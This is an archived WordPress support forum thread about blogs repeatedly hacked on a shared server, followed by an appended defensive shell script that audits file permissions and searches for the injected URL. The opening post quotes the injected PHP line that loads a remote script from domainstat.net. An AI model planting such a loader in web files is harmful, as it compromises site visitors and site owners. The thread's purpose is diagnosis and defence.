WP Hacked Twice (66 posts)

  1. OrchidRed
    Member
    Posted 8 years ago #

    My site has been hacked twice this month and I can't figure out how. It begins with my-hacks.php, where WP tells me that the headers were already sent. Opening my-hacks reveals that this bit of code has somehow been added to the file:

    <? if (!defined('domainstat')) { define("domainstat", "ok"); echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script>";}?>

    Deleting that bit of code causes all my plugin and admin.php files to stop working and stylsheet.css stops working. The last time this happened the hack got progressively worse, eventually changing all my post links to a new link that sent people to a hardcore porno video.

    How is this happening? Anyone know how I can prevent it? Fix it?? HELP!!

  2. moshu
    Member
    Posted 8 years ago #

    Upgrade?

  3. OrchidRed
    Member
    Posted 8 years ago #

    I'm already using the most recent version of WP. Initially they hacked my personal blog at http://www.themutteringmuse.com so my host company moved me to a new server. But now they have hacked both my personal blog and my photoblog at theshapeoflight.com. I'm really at a loss here.

  5. Cypher
    Member
    Posted 8 years ago #

    Some details, what version of WP, PHP and Apache? Ask your host about possible break-ins. A lot of times, inappropriate security across users on a shared hosting can allow for such hacks.

    Regards

  6. moshu
    Member
    Posted 8 years ago #

    From your source code:
    <title>The Shape of Light</title>
    <meta name="generator" content="WordPress 1.5.1.2" />

    Not really "the most recent"...

  8. OrchidRed
    Member
    Posted 8 years ago #

    I'm running WP 1.5.2 Strayhorn. PHP version 4.4.1. Apache version 1.3.34 (Unix).

    The first time my site was hacked my host company thought that it was because I was using the CodeGRRL calendar script, which was recently exploited by hackers. But then they moved me to a new server, we deleted ALL non-WP files. We just got my sites back up and running last night and now they've been hacked again. :( I'm tempted to just give up on my sites, I worked SO hard to get them back up and running. :sob:

  9. OrchidRed
    Member
    Posted 8 years ago #

    Moshu, when I log into WP it tells me it's WP 1.2.

    The header probably isn't correct because I pasted it from an earlier template that was running on 1.5.1.2.

  10. moshu
    Member
    Posted 8 years ago #

    WP 1.2? That's even worse. The latest stable is 1.5.3

  11. OrchidRed
    Member
    Posted 8 years ago #

    Moshu: Sorry, I meant WP 1.5.2 Strayhorn. I'm really flustered right now.

    I'm running WP 1.5.2 Strayhorn. PHP version 4.4.1. Apache version 1.3.34 (Unix).

  12. moshu
    Member
    Posted 8 years ago #

    And I have to apologize, too.
    The latest is 1.5.2. Sorry.

  13. orlo
    Member
    Posted 8 years ago #

    This seems indeed a little bit worrying. Since reading these posts I got confused about which version you exactly use. Probably it's best to first check your xmlrpc.php file.
    Just in case (it's still from the old version)

    For the javascript included there seems to be a quick workaround... but we need to find the hole/problem they are using...

  14. OrchidRed
    Member
    Posted 8 years ago #

    Orlo, the info I posted is correct, it's WP 1.5.2 Strayhorn. I just made a mistake when I responded to Moshu because I was really upset as I was typing.

    Well, even if I delete the javascript (which I did on one site) all the WP files themselves are now having problems. I tried replacing them with new ones by reuploading WP, but that didn't fix the problem.

    For example, one error I'm getting is:

    Warning: Cannot modify header information - headers already sent by (output started at /home/akakestr/public_html/muse/wp-content/plugins/friendlycomments.php:52) in /home/akakestr/public_html/muse/wp-admin/admin.php on line 10

    Warning: Cannot modify header information - headers already sent by (output started at /home/akakestr/public_html/muse/wp-content/plugins/friendlycomments.php:52) in /home/akakestr/public_html/muse/wp-admin/admin.php on line 11

    Warning: Cannot modify header information - headers already sent by (output started at /home/akakestr/public_html/muse/wp-content/plugins/friendlycomments.php:52) in /home/akakestr/public_html/muse/wp-admin/admin.php on line 12

    Warning: Cannot modify header information - headers already sent by (output started at /home/akakestr/public_html/muse/wp-content/plugins/friendlycomments.php:52) in /home/akakestr/public_html/muse/wp-admin/admin.php on line 13

    And I just replaced this file.

  15. OrchidRed
    Member
    Posted 8 years ago #

    Also, I should note that deactivating plugins doesn't change anything, it just causes new errors with other files.

  16. orlo
    Member
    Posted 8 years ago #

    I'll try to get in touch with you via email. Although I think if you are really using the latest version, there might be a bigger problem. A quick search on Google revealed that more people are having a similar problem. Found a WordPress 1.2.2 (see report here:
    http://board.thefanlistings.org/index.php?showtopic=47631)
    another report here: http://forum.powweb.com/showthread.php?p=345602 and
    someone on: PostNuke 0.7.6.1

  17. whooami
    Member
    Posted 8 years ago #

    FYI, your blog site .. the permalinks as well as the comment links are prompting me to download a .wmv file (Windows Media file) and nope I'm not up for being a guinea pig and seeing what it is. I appear to be doing this as you're messing with things since it has just stopped but looking at your source it looks like you put back the snippet of js in the header, as they all appear to be working as normally, but loading rather slow.

    By the way, these sorts of javascript issues are becoming a reoccurring topic on the forums, again :

    NO FILES SHOULD BE CHMOD 666 OR 777 AS A RULE (ON ANY SITE, REGARDLESS OF WHAT SOFTWARE OR APPLICATIONS YOU ARE USING).

    WordPress allows you to edit files via the admin area, but trust me when I say that that's a huge issue as that requires world-writable files. If you are insistent on editing files that way, it is best that you do it, and then chmod any files you edited back to the correct permissions (644 or 755, respectively).

    It's worth noting also that wp-cache, I presume, requires a whole directory's worth of files be world-writable.

  19. OrchidRed
    Member
    Posted 8 years ago #

    Whooami, that wmv file is a porno video, that's the same thing that happened the last time my site was hacked.

    As for messing with the site, that's really disturbing that you said files are changing because I haven't done anything to it since starting this thread. The only thing I did (before posting here) was delete the js, but it reappeared soon afterwards.

  20. OrchidRed
    Member
    Posted 8 years ago #

    Orlo, yes please do email me. I can be reached at amadai at gmail dot com.

  21. OrchidRed
    Member
    Posted 8 years ago #

    whooami, good to know. I'm definitely not going to edit files in WP anymore.

  22. whooami
    Member
    Posted 8 years ago #

    OrchidRed, I know.. which is why I'm not guinea pig it.. Good luck, I'm afraid it's snowing, and I am off to work..

  23. TechGnome
    Moderator
    Posted 8 years ago #

    Have you looked to see if there's an .htaccess file? Someone may have dumped one there that's causing the redirects to the wmv file. It's just a guess though.

    -tg

  24. vkaryl
    Member
    Posted 8 years ago #

    Two possibles spring to mind, kestrel. Either you have totally pissed off the world's greatest hacker (hopefully not, but if that's it I don't think we can help you!); or your host has some sort of security problem of their own (or a dodgy employee - not really likely, but has been known to happen....)

    If they put you on a new server, and you had nothing there BUT WP 1.5.2 (which so far and crossing fingers hasn't any obvious open sores far as vulnerabilities go), it's perhaps time to ask them again if they have a problem somewhere....

    TG has a good point as well: because if your first-hacked install was due to someone dropping a dirty .htaccess in your folder, you might have moved it along with your blog when you moved to the new server.

    Also, have you used phpMyAdmin to look at your database, to see if there are tables which don't belong there?

  25. orlo
    Member
    Posted 8 years ago #

    I talked to kestrel - and it seems the provider has a bigger problem... the log file shows that some script is spreading across different clients/users on the same server - so I am not really sure if WP was the problem to start with... but changing the access rights should help a little... I think the provider will eventually figure it out :-D

    Seems like they are responding fast...

    As I said before - seems like a couple of servers are affected (see Google)...

  26. vkaryl
    Member
    Posted 8 years ago #

    Ouch. Thanks for the report, orlo. Any chance you or kestrel would be willing to state which host, in case there are others who will be looking for info on the problem?

  27. moshu
    Member
    Posted 8 years ago #

    Among "others" consider this guy:
    http://wordpress.org/support/topic/50701#post-278892

  28. orlo
    Member
    Posted 8 years ago #

    The provider is looking at the issue on a general level - at least that was my understanding - they found a log file (created by the malicious script) which listed all files that were infected... seems like they are going through their servers right now...
    Maybe kestrel can tell you more as soon as they are done...

  29. Righton
    Member
    Posted 8 years ago #

    So if I email my host about this, they should be able to assist me you think?

    My issue is I have one of these scripts in front of my DOCTYPE, and it's not visible in the template file... I can't find it anywhere.

  30. OrchidRed
    Member
    Posted 8 years ago #

    Hi all, sorry for not responding sooner I was at work and didn't have computer access.

    My host thinks there is a file somewhere in the root folder of my server and that it has been systematically rewriting every WP file on the _entire_ server, so it's not just my account. They think this is the case because they found a txt file that has been logging all the files that have been corrupted.

    It seems like it only rewrites WP files because non-WP php files haven't been affected. (We're guessing that it exploits the fact that many of them were CHMOD to 666 like whooami said?) It completely messes up the admin panel and turns comments/permalinks into links to a wmv porno file.

    That's all I know. My host temporarily stopped the attack by freezing some folders, but they haven't been able to find the file that is responsible for all this.
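
Added example, not part of the original thread or of WordPress: a shell audit for the two conditions the posts describe, world-writable files and directories (chmod 666/777) and PHP files carrying the injected domainstat.net script loader. The function names and the web-root path passed to them are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit a web root for the conditions discussed in the thread.
# Function names are hypothetical; pass the web root as the first argument.

# The injected loader quoted in the first post pulls this URL.
MARKER='domainstat.net/stat.php'

# List regular files and directories any local user can write to
# (mode bit o+w, which covers both 666 and 777).
find_world_writable() {
    find "$1" \( -type f -o -type d \) -perm -0002 -print | sort
}

# List PHP files that contain the injected loader's URL (fixed-string match).
find_injected() {
    grep -rlF --include='*.php' -e "$MARKER" "$1" 2>/dev/null | sort
}

# Reset to the permissions recommended in the thread:
# 644 for files, 755 for directories.
reset_perms() {
    find "$1" -type f -exec chmod 644 {} +
    find "$1" -type d -exec chmod 755 {} +
}

# Print a short report for one web root.
audit() {
    echo "== world-writable paths under $1 =="
    find_world_writable "$1"
    echo "== PHP files containing $MARKER =="
    find_injected "$1"
}

# Run the report only when a path is given on the command line.
if [ "$#" -gt 0 ]; then
    audit "$1"
fi
```

Files listed by find_injected should be restored from a known-clean copy rather than hand-edited; on a shared server where another account's script can write to them, the injection returns until the permissions are corrected.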
